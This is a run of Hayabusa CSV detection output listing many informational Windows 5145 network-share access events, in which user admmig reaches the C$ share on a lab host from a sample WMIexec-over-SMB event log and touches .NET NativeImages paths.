10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.787 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Runteb92aa12#\183eaaded316165bfbd32a991e4e8c8a : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.787 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Security : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.787 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Security\ba6ea4732f569e0674d6a43a82de5cc2 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.787 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Serv14b62006# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.787 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Serv14b62006#\09e0258d6e4a9d467c32dc8ac58766f2 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.787 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Serv30e99c02# : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.787 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Serv30e99c02#\c97638c574cae07911907fa19e2aeedd : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.803 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Serv43e0ae6e# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.819 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Serv43e0ae6e#\e9302436a2c607db888bcb3b14ebba8e : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.834 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Serv759bfb78# : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.834 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Serv759bfb78#\5e015d37aa3fdc75648e9d00d44d13ac : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.850 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Serv14259fd9# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.866 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Serv14259fd9#\3c06d012b88601107a4449fb04067a20 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.882 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Servae423458# : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.882 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Servae423458#\67f143e1f5d81dae33879b84e0035cad : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.906 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Servb00a6512# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.906 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Servb00a6512#\03d76bf2a39a57e8bed74e782c62fd1c : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.906 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Servd1dec626# : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.906 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Servd1dec626#\ee53227bcc4430088d0b560752c1cd02 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.906 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Servf73e6522# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.906 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Servf73e6522#\39bc23d9592ef276c70a36ef0311070a : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.922 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.ServiceModel : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.922 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.ServiceModel\4c3126aec3364546e4ade89c24c4e742 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.922 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Speech : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.922 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Speech\6d5f82d8178e3d8e9931e70dce584863 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.922 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Transactions : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.922 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Transactions\95c749867e5f72a09ed1e59a57931301 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.922 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.922 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web\90285827b1300835ca1aaff1dff83a01 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.938 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.8da3333a# : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.938 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.8da3333a#\3dde15282321aa41c609dc7f7a5f1af5 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.938 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.8dc504e4# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.938 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.8dc504e4#\61d489d8a768782ce394f299dcc0e4bb : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.969 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.9c7998a9# : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.969 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.9c7998a9#\f2c2cff3fa34c990079298396b1ec1fc : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.000 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.28b9ef5a# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.000 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.28b9ef5a#\4b7763786015950c44dbba0ff26b883e : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.016 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.82d5542b# : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.016 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.82d5542b#\af89139de3b87146c705fa989eeaa4b1 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.031 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.188dd00b# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.031 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.188dd00b#\db42d61826797328b8b368348c6b3f13 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.063 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.1586a486# : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.063 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.1586a486#\9de316f43fe18621a13deefe7dbbbc27 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.078 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.2486c0f5# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.094 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.2486c0f5#\5a669ebdf74fb2c8f0d8148b4f79b9a2 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.094 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.4961ff77# : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.094 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.4961ff77#\81722d79b43d0329413516f10c3faf60 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.094 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.dc83ace6# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.094 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.dc83ace6#\cd0ef620fc82b9dab224ae428bb2a910 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.109 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.Entity : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.109 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.Entity\0023a84796c78827e3d0176900ba5b59 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.109 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.Mobile : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.109 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.Mobile\84ecb78e3635883e1cf8acae1dec527e : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.109 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.Routing : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.109 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.Routing\aa9b0e256833bf2671e6cb5370559f4f : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.109 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.Services : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.109 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.Services\fe0f1499df5082fd5392827ddfb03c9e : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.109 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Wind0de890be# : IP Address: 
